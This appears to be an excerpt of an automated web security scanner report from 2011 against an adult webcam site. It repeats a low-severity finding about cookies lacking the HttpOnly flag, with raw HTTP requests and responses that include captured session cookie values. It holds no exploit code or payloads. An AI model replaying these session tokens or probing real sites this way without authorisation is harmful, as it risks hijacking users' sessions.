HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:14 GMT Connection: close Content-Length: 93218 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shemale/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:17 GMT Connection: close Content-Length: 223493 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /live-sex-chats/shy-girl/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:18:49 GMT Connection: close Content-Length: 167612 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /liveexperts.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:18 GMT Connection: close Content-Length: 19369 Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /localcompanionship.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:20 GMT Connection: close Content-Length: 16528 Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /minglesingles.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:19 GMT Connection: close Content-Length: 16092 Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:27 GMT Connection: close Content-Length: 9835 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /preparesearch.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 18859 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sex_webcams_index/index.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 23768 Vary: Accept-Encoding
<html> <head> <title> Live Sex Chat Categories at ImLive </title> <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sitemap.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:00 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:00 GMT Connection: close Content-Length: 33732 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /videosfr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:11:20 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:21 GMT Connection: close Content-Length: 15706 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /warningms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:23:28 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:28 GMT Connection: close Content-Length: 14418 Vary: Accept-Encoding
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webcam-advanced-search/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:56 GMT Connection: close Content-Length: 74384 Vary: Accept-Encoding
